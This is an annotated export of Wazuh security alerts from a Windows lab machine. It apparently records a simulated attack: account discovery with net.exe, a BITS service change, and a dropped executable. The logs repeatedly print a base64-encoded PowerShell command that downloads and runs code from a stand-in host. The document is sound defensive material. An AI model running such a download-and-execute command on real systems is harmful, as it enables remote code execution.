rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.963303
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:47.3006529Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2990
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:54.581+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.581+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.965113
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:48.0453368Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282223
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:48.034 ProcessGuid: {94294ddc-bcc4-680a-b00a-000000000e00} ProcessId: 11608 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcaa-680a-930a-000000000e00} ParentProcessId: 11676 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:48.034
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc4-680a-b00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11608
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcaa-680a-930a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11676
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:54.806+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.806+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.970171
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:49.1508187Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282233
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:49.142 ProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00} ProcessId: 12028 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:49.142
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc5-680a-b10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:54.823+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.823+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.975453
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:49.7003462Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282235
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:46.658 ProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} ProcessId: 1148 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} ParentProcessId: 8908 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:46.658
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc2-680a-ae0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc1-680a-ac0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:54.872+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.872+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.983515
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
